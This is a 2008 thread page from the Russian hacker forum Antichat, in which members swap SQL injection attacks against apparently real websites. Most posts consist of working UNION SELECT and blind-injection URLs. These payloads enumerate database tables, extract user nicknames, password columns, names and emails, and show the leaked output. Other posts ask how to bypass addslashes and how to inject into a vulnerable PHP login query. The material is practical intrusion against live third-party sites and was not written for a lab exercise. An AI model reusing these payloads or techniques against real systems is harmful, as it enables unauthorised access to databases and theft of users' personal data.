ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2501  
Старый 30.06.2008, 15:09
Аватар для Naydav
Naydav
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583

Репутация: 210
По умолчанию

Мистерео
Цитата:
http://www.oke.ru/xo4u.php?id=146432+and+1=2+UNION+SELECT+1,2,versio n(),4,user(),6,7,8,9,10+FROM+chausers/*
3 и 5 - "Рабочие столбцы", именно их выводит скрипт
5.1.16-beta-log
gsokecomru@localhost

а так все выводит
Пример
Цитата:
http://www.oke.ru/xo4u.php?id=146432+and+1=2+UNION+SELECT+1,2,777777 77777,4,user(),6,7,8,9,10+FROM+chausers/*

Последний раз редактировалось Naydav; 30.06.2008 в 15:19..
 
Ответить с цитированием

  #2502  
Старый 30.06.2008, 15:11
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Мистерео  
но ниче не выводит
Как понять не выводится? А надпись "фанатик" жирным шрифтом тебя не настораживает?
В этой таблице инфа которую юзеры пишут в комментариях, что ты там хочешь найти?
 
Ответить с цитированием

  #2503  
Старый 30.06.2008, 15:14
Аватар для Мистерео
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию

ну так в 3 какраз стоит запрос на nick и passw но скрипт не хочет их показывать.
Все спс
 
Ответить с цитированием

  #2504  
Старый 30.06.2008, 16:15
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Мистерео
Цитата:
http://www.oke.ru/
xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,version(),database(),user())) ),5,6,7/*
не знаю как у вас а у меня вообще 7 колонок..))
Цитата:
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,table_name,table_schema))),5, 6,7+from+information_schema.tables+limit+30,1/*
нету там вобше ничего в бд.) 4 поломаные таблицы information_schema и oke.chausers.
Цитата:
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,column_name,table_name,table_ schema))),5,6,7+from+information_schema.columns+wh ere+table_name=0x6368617573657273/*
достаем колонки данной таблицы.)
Цитата:
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,id,nick,passw))),5,6,7+from+o ke.chausers/*
тут мы получаем id и nick тех людей которые пишут коменты...) а где ты там вобше login увидел? тоесть колонка passw - пустая.
Цитата:
http://www.oke.ru/xo4u.php?id=146432+and+1=2+union+select+1,2,3,unhe x(hex(concat_ws(0x3a,id,name,email,0x3a3a,want))), 5,6,7+from+wants/*
намного интереснее будет почитать желания..))

Последний раз редактировалось sabe; 30.06.2008 в 16:31..
 
Ответить с цитированием

  #2505  
Старый 30.06.2008, 21:07
Аватар для Doom123
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию

Есть способ обхода addslashes() ?

еси там чтото типо

"select ..bla... id = \"$_GET['bla']\""

Последний раз редактировалось Doom123; 30.06.2008 в 21:14..
 
Ответить с цитированием

  #2506  
Старый 30.06.2008, 22:21
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

хм.. может попробовать закрыть кавычки с тем же бэкслэшем? если можно линку, то я подумаю.. просто не могу я думать, смотря на голые мускульнуе запросы=)
 
Ответить с цитированием

  #2507  
Старый 30.06.2008, 22:43
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999'
 
Ответить с цитированием

  #2508  
Старый 01.07.2008, 06:09
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

хм.. даже и не понял как там что то можно реализовать... ведь то что выводится ошибка после подстановки кавычки еще не осначает что есть возможность проведения инъекции.. может быть просто в скрипт передано неправильное значение, вот он и ругается, а попытки что то из этого выжать провалились с треском.. по крайней мере у меня..
 
Ответить с цитированием

  #2509  
Старый 01.07.2008, 08:34
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gorev  
http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999'
ну например можно слепую инъекцию использовать:
Код:
http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999' WHERE tracking_id=134205 or if ((select 1)=1,1,(select 1 union select 2))=1%23
для закомментирования надо использовать решетку (%23)
но на самом деле там есть скули с выводом
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #2510  
Старый 01.07.2008, 21:45
Аватар для Бармалей
Бармалей
Новичок
Регистрация: 30.05.2008
Сообщений: 4
Провел на форуме:
6739

Репутация: 0
По умолчанию

есть следующая страничка
Код:
<?
$query="select * from spisok_users where user_name='$login' and password='$password'";
$result=mysql_query($query, $db);
$row=mysql_num_rows($result);?>
так вот можно ли как то изменить ее чтобы сделать из php-инъекцию?
пробывал
?password='%22;echo%22ghbdtn%22;exit;

или такое вообще не возможно?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ